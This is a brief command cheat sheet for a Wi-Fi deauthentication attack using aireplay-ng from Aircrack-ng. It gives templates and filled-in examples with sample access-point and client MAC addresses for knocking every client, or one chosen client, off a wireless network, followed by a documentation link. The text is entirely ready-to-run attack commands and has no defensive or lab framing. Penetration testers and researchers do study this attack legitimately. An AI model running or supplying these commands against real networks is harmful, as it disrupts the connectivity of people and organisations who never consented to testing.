Deauthentication attack in Wifi with Aircrack-ng

deauthenticate all clients in a network

aireplay-ng --deauth [number of deauth packets] -a [access point mac] [monitor interface]
aireplay-ng --deauth 10 -a FC:75:16:D4:CC:2A wlan0mon

deauthenticate a specific client in a network

aireplay-ng --deauth [number of deauth packets] -a [access point mac] -c [target mac] [monitor interface]
aireplay-ng --deauth 10 -a FC:75:16:D4:CC:2A -c 50:01:BB:7B:95:17 wlan0mon

References :
http://www.aircrack-ng.org/doku.php?id=deauthentication